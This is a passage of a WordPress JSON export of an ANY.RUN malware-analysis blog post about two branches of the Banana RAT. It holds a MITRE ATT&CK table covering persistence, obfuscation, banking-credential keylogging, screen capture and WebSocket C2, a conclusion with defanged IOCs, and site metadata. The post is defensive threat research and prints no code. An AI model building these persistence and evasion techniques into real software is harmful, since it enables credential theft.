class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"D4\"\n                    data-col-index=\"3\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Automated deployment of hidden tasks executed as SYSTEM via Register-ScheduledTask\u00a0\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A5\"\n                    data-col-index=\"0\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Persistence\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B5\"\n                    data-col-index=\"1\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Boot or Logon Autostart Execution: Registry Run Keys \/ Startup Folder\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C5\"\n                    data-col-index=\"2\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1547.001\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"D5\"\n                    data-col-index=\"3\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Fallback persistence structure utilizing HKCU\\...\\CurrentVersion\\Run if privileges are not elevated\u00a0\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A6\"\n                    data-col-index=\"0\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Defense Evasion\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B6\"\n                    data-col-index=\"1\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Obfuscated Files or Information\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C6\"\n                    data-col-index=\"2\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1027\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"D6\"\n                    data-col-index=\"3\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Multi-layered character reconstruction algorithms (ofuscador.py) and backend string splitting.\u00a0\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A7\"\n                    data-col-index=\"0\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Defense Evasion\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B7\"\n                    data-col-index=\"1\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Hide Artifacts: Hidden Files and Directories\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C7\"\n                    data-col-index=\"2\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1564.001\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"D7\"\n                    data-col-index=\"3\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Target payload files and persistence launchers utilize system attributes and restricted paths.\u00a0\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A8\"\n                    data-col-index=\"0\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Defense Evasion\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B8\"\n                    data-col-index=\"1\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Deobfuscate\/Decode Files or Information\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C8\"\n                    data-col-index=\"2\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1140\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"D8\"\n                    data-col-index=\"3\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Memory-side invocation of base64-decoded wrappers and .NET reflection for sensitive API calls\u00a0\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A9\"\n                    data-col-index=\"0\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Discovery\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B9\"\n                    data-col-index=\"1\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        System Information Discovery\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C9\"\n                    data-col-index=\"2\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1082\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"D9\"\n                    data-col-index=\"3\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Active extraction of MachineGuid and environment flags to generate host-specific parameters.\u00a0\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A10\"\n                    data-col-index=\"0\"\n                    data-row-index=\"9\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Discovery\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B10\"\n                    data-col-index=\"1\"\n                    data-row-index=\"9\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Process Discovery\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C10\"\n                    data-col-index=\"2\"\n                    data-row-index=\"9\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1057\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"D10\"\n                    data-col-index=\"3\"\n                    data-row-index=\"9\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Automated verification of active processes against hardcoded local defense lists.\u00a0\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A11\"\n                    data-col-index=\"0\"\n                    data-row-index=\"10\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Collection\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B11\"\n                    data-col-index=\"1\"\n                    data-row-index=\"10\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Input Capture: Keylogging\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C11\"\n                    data-col-index=\"2\"\n                    data-row-index=\"10\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1056.001\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"D11\"\n                    data-col-index=\"3\"\n                    data-row-index=\"10\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Native API-level monitoring (keybd_event) for capturing active banking credentials.\u00a0\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A12\"\n                    data-col-index=\"0\"\n                    data-row-index=\"11\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Collection\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B12\"\n                    data-col-index=\"1\"\n                    data-row-index=\"11\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Screen Capture\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C12\"\n                    data-col-index=\"2\"\n                    data-row-index=\"11\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1113\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"D12\"\n                    data-col-index=\"3\"\n                    data-row-index=\"11\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        In-memory .NET reflection calling screenshot routines and web overlay injections.\u00a0\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A13\"\n                    data-col-index=\"0\"\n                    data-row-index=\"12\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Command & Control\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B13\"\n                    data-col-index=\"1\"\n                    data-row-index=\"12\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Application Layer Protocol: Web Protocols\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C13\"\n                    data-col-index=\"2\"\n                    data-row-index=\"12\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1071.001\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"D13\"\n                    data-col-index=\"3\"\n                    data-row-index=\"12\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        High-frequency asynchronous communication over WebSockets (wss:\/\/...\/agent).\u00a0\u00a0                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-339'>\ntable#wpdtSimpleTable-339{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-339 td, table.wpdtSimpleTable339 th { white-space: normal !important; }\n.wpdt-fs-000014 { font-size: 14px !important;}\n.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}\n.wpdt-fs-000012 { font-size: 12px !important;}\n<\/style>\n\n\n\n\n<h2 class=\"wp-block-heading\">Conclusion<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">The exposed server at 198[.]245[.]53[.]26 gave a rare opportunity to compare two related Banana RAT branches through live infrastructure, sandbox telemetry, and recovered payloads. The older branch used ETW-themed paths, static Microsoft-looking names, and a typo-based pseudo-Microsoft C2 identity. The newer branch kept the same staging concept but moved to randomized install identifiers, better-structured SYSTEM persistence, and a WebSocket channel built around a hashed testewin.com subdomain.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The main takeaways are:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The staging host remained stable across both detonations.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The payload branch changed significantly between May 25, 2026 and June 09, 2026.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The newer runtime payload recovered from disk exactly matches the sandbox-dropped payload (same SHA256).<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The fallback IP 149[.]56[.]12[.]51 is a reliable cross-branch anchor.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The public index exposed not only stage files but also backend tooling consistent with active, polymorphic payload generation.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Editor\u2019s note:&nbsp;The analysis is authored by Moises Cerqueira,&nbsp;malware researcher &amp; threat hunter. You can&nbsp;find Moises on&nbsp;LinkedIn&nbsp;and&nbsp;X. This analysis started with an exposed public index on 198[.]245[.]53[.]26, discovered via Shodan. What made it interesting was not just the server exposure itself, but the fact that it lets us compare two different Banana RAT branches tied to [&hellip;]<\/p>\n","protected":false},"author":19,"featured_media":21907,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[8],"tags":[57,34,40],"class_list":["post-21824","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-malware-analysis","tag-anyrun","tag-malware-analysis","tag-malware-behavior"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.7 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Banana RAT Evolves: Comparing Branches Through ANY.RUN<\/title>\n<meta name=\"description\" content=\"ANY.RUN solutions are used to compare two Banana RAT branches and analyze the malware&#039;s evolution along with defence strategies.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/any.run\/cybersecurity-blog\/banana-rat-evolution-analysis\/\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Moises Cerqueira (0xOlympus)\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"10 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/any.run\\\/cybersecurity-blog\\\/banana-rat-evolution-analysis\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/any.run\\\/cybersecurity-blog\\\/banana-rat-evolution-analysis\\\/\"},\"author\":{\"name\":\"Moises Cerqueira (0xOlympus)\",\"@id\":\"https:\\\/\\\/any.run\\\/\"},\"headline\":\"Banana RAT Evolves: Comparing Two Recent Branches Through ANY.RUN\u00a0\",\"datePublished\":\"2026-07-07T14:02:31+00:00\",\"dateModified\":\"2026-07-07T14:31:04+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/any.run\\\/cybersecurity-blog\\\/banana-rat-evolution-analysis\\\/\"},\"wordCount\":1646,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/any.run\\\/\"},\"image\":{\"@id\":\"https:\\\/\\\/any.run\\\/cybersecurity-blog\\\/banana-rat-evolution-analysis\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/any.run\\\/cybersecurity-blog\\\/wp-content\\\/uploads\\\/2026\\\/06\\\/BananaRAT-scaled.png\",\"keywords\":[\"ANYRUN\",\"malware analysis\",\"malware behavior\"],\"articleSection\":[\"Malware Analysis\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/any.run\\\/cybersecurity-blog\\\/banana-rat-evolution-analysis\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/any.run\\\/cybersecurity-blog\\\/banana-rat-evolution-analysis\\\/\",\"url\":\"https:\\\/\\\/any.run\\\/cybersecurity-blog\\\/banana-rat-evolution-analysis\\\/\",\"name\":\"Banana RAT Evolves: Comparing Branches Through ANY.RUN\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/any.run\\\/\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/any.run\\\/cybersecurity-blog\\\/banana-rat-evolution-analysis\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/any.run\\\/cybersecurity-blog\\\/banana-rat-evolution-analysis\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/any.run\\\/cybersecurity-blog\\\/wp-content\\\/uploads\\\/2026\\\/06\\\/BananaRAT-scaled.png\",\"datePublished\":\"2026-07-07T14:02:31+00:00\",\"dateModified\":\"2026-07-07T14:31:04+00:00\",\"description\":\"ANY.RUN solutions are used to compare two Banana RAT branches and analyze the malware's evolution along with defence strategies.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/any.run\\\/cybersecurity-blog\\\/banana-rat-evolution-analysis\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/any.run\\\/cybersecurity-blog\\\/banana-rat-evolution-analysis\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/any.run\\\/cybersecurity-blog\\\/banana-rat-evolution-analysis\\\/#primaryimage\",\"url\":\"https:\\\/\\\/any.run\\\/cybersecurity-blog\\\/wp-content\\\/uploads\\\/2026\\\/06\\\/BananaRAT-scaled.png\",\"contentUrl\":\"https:\\\/\\\/any.run\\\/cybersecurity-blog\\\/wp-content\\\/uploads\\\/2026\\\/06\\\/BananaRAT-scaled.png\",\"width\":2560,\"height\":1243,\"caption\":\"Banana RAT evolution\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/any.run\\\/cybersecurity-blog\\\/banana-rat-evolution-analysis\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/any.run\\\/cybersecurity-blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Malware Analysis\",\"item\":\"https:\\\/\\\/any.run\\\/cybersecurity-blog\\\/category\\\/malware-analysis\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Banana RAT Evolves: Comparing Two Recent Branches Through ANY.RUN\u00a0\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/any.run\\\/\",\"url\":\"https:\\\/\\\/any.run\\\/\",\"name\":\"ANY.RUN&#039;s Cybersecurity Blog\",\"description\":\"Cybersecurity Blog covers topics for experienced professionals as well as for those new to it.\",\"publisher\":{\"@id\":\"https:\\\/\\\/any.run\\\/\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/any.run\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/any.run\\\/\",\"name\":\"ANY.RUN\",\"url\":\"https:\\\/\\\/any.run\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/any.run\\\/\",\"url\":\"https:\\\/\\\/any.run\\\/cybersecurity-blog\\\/wp-content\\\/uploads\\\/2020\\\/08\\\/ANYRUN-Icon.svg\",\"contentUrl\":\"https:\\\/\\\/any.run\\\/cybersecurity-blog\\\/wp-content\\\/uploads\\\/2020\\\/08\\\/ANYRUN-Icon.svg\",\"width\":1,\"height\":1,\"caption\":\"ANY.RUN\"},\"image\":{\"@id\":\"https:\\\/\\\/any.run\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/www.any.run\\\/\",\"https:\\\/\\\/x.com\\\/anyrun_app\",\"https:\\\/\\\/www.linkedin.com\\\/company\\\/30692044\",\"https:\\\/\\\/www.youtube.com\\\/channel\\\/UCOgCPho7lzmH7m6fPNlukrQ\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/any.run\\\/\",\"name\":\"Moises Cerqueira (0xOlympus)\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/any.run\\\/cybersecurity-blog\\\/wp-content\\\/uploads\\\/2026\\\/02\\\/Moises.jpg\",\"url\":\"https:\\\/\\\/any.run\\\/cybersecurity-blog\\\/wp-content\\\/uploads\\\/2026\\\/02\\\/Moises.jpg\",\"contentUrl\":\"https:\\\/\\\/any.run\\\/cybersecurity-blog\\\/wp-content\\\/uploads\\\/2026\\\/02\\\/Moises.jpg\",\"caption\":\"Moises Cerqueira (0xOlympus)\"},\"description\":\"Malware Researcher & Threat Hunter with a strong background in Blue Team operations. Specialized in malware analysis and reverse engineering, with hands-on experience dissecting binaries and reconstructing attacker TTPs from initial delivery to command-and-control communication. Driven by a deep interest in adversary tradecraft, bridging low-level technical analysis with strategic threat intelligence and detection engineering. Follow Moises on: LinkedIn X Website\",\"sameAs\":[\"https:\\\/\\\/0xdelta.org\\\/\"],\"url\":\"#molongui-disabled-link\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Banana RAT Evolves: Comparing Branches Through ANY.RUN","description":"ANY.RUN solutions are used to compare two Banana RAT branches and analyze the malware's evolution along with defence strategies.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/any.run\/cybersecurity-blog\/banana-rat-evolution-analysis\/","twitter_misc":{"Written by":"Moises Cerqueira (0xOlympus)","Est. reading time":"10 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/any.run\/cybersecurity-blog\/banana-rat-evolution-analysis\/#article","isPartOf":{"@id":"https:\/\/any.run\/cybersecurity-blog\/banana-rat-evolution-analysis\/"},"author":{"name":"Moises Cerqueira (0xOlympus)","@id":"https:\/\/any.run\/"},"headline":"Banana RAT Evolves: Comparing Two Recent Branches Through ANY.RUN\u00a0","datePublished":"2026-07-07T14:02:31+00:00","dateModified":"2026-07-07T14:31:04+00:00","mainEntityOfPage":{"@id":"https:\/\/any.run\/cybersecurity-blog\/banana-rat-evolution-analysis\/"},"wordCount":1646,"commentCount":0,"publisher":{"@id":"https:\/\/any.run\/"},"image":{"@id":"https:\/\/any.run\/cybersecurity-blog\/banana-rat-evolution-analysis\/#primaryimage"},"thumbnailUrl":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/06\/BananaRAT-scaled.png","keywords":["ANYRUN","malware analysis","malware behavior"],"articleSection":["Malware Analysis"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/any.run\/cybersecurity-blog\/banana-rat-evolution-analysis\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/any.run\/cybersecurity-blog\/banana-rat-evolution-analysis\/","url":"https:\/\/any.run\/cybersecurity-blog\/banana-rat-evolution-analysis\/","name":"Banana RAT Evolves: Comparing Branches Through ANY.RUN","isPartOf":{"@id":"https:\/\/any.run\/"},"primaryImageOfPage":{"@id":"https:\/\/any.run\/cybersecurity-blog\/banana-rat-evolution-analysis\/#primaryimage"},"image":{"@id":"https:\/\/any.run\/cybersecurity-blog\/banana-rat-evolution-analysis\/#primaryimage"},"thumbnailUrl":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/06\/BananaRAT-scaled.png","datePublished":"2026-07-07T14:02:31+00:00","dateModified":"2026-07-07T14:31:04+00:00","description":"ANY.RUN solutions are used to compare two Banana RAT branches and analyze the malware's evolution along with defence strategies.","breadcrumb":{"@id":"https:\/\/any.run\/cybersecurity-blog\/banana-rat-evolution-analysis\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/any.run\/cybersecurity-blog\/banana-rat-evolution-analysis\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/any.run\/cybersecurity-blog\/banana-rat-evolution-analysis\/#primaryimage","url":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/06\/BananaRAT-scaled.png","contentUrl":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/06\/BananaRAT-scaled.png","width":2560,"height":1243,"caption":"Banana RAT evolution"},{"@type":"BreadcrumbList","@id":"https:\/\/any.run\/cybersecurity-blog\/banana-rat-evolution-analysis\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/any.run\/cybersecurity-blog\/"},{"@type":"ListItem","position":2,"name":"Malware Analysis","item":"https:\/\/any.run\/cybersecurity-blog\/category\/malware-analysis\/"},{"@type":"ListItem","position":3,"name":"Banana RAT Evolves: Comparing Two Recent Branches Through ANY.RUN\u00a0"}]},{"@type":"WebSite","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/","name":"ANY.RUN&#039;s Cybersecurity Blog","description":"Cybersecurity Blog covers topics for experienced professionals as well as for those new to it.","publisher":{"@id":"https:\/\/any.run\/"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/any.run\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/any.run\/","name":"ANY.RUN","url":"https:\/\/any.run\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg","contentUrl":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg","width":1,"height":1,"caption":"ANY.RUN"},"image":{"@id":"https:\/\/any.run\/"},"sameAs":["https:\/\/www.facebook.com\/www.any.run\/","https:\/\/x.com\/anyrun_app","https:\/\/www.linkedin.com\/company\/30692044","https:\/\/www.youtube.com\/channel\/UCOgCPho7lzmH7m6fPNlukrQ"]},{"@type":"Person","@id":"https:\/\/any.run\/","name":"Moises Cerqueira (0xOlympus)","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/02\/Moises.jpg","url":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/02\/Moises.jpg","contentUrl":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/02\/Moises.jpg","caption":"Moises Cerqueira (0xOlympus)"},"description":"Malware Researcher & Threat Hunter with a strong background in Blue Team operations. Specialized in malware analysis and reverse engineering, with hands-on experience dissecting binaries and reconstructing attacker TTPs from initial delivery to command-and-control communication. Driven by a deep interest in adversary tradecraft, bridging low-level technical analysis with strategic threat intelligence and detection engineering. Follow Moises on: LinkedIn X Website","sameAs":["https:\/\/0xdelta.org\/"],"url":"#molongui-disabled-link"}]}},"_links":{"self":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/21824","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/users\/19"}],"replies":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/comments?post=21824"}],"version-history":[{"count":31,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/21824\/revisions"}],"predecessor-version":[{"id":21957,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/21824\/revisions\/21957"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/media\/21907"}],"wp:attachment":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/media?parent=21824"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/categories?post=21824"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/tags?post=21824"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}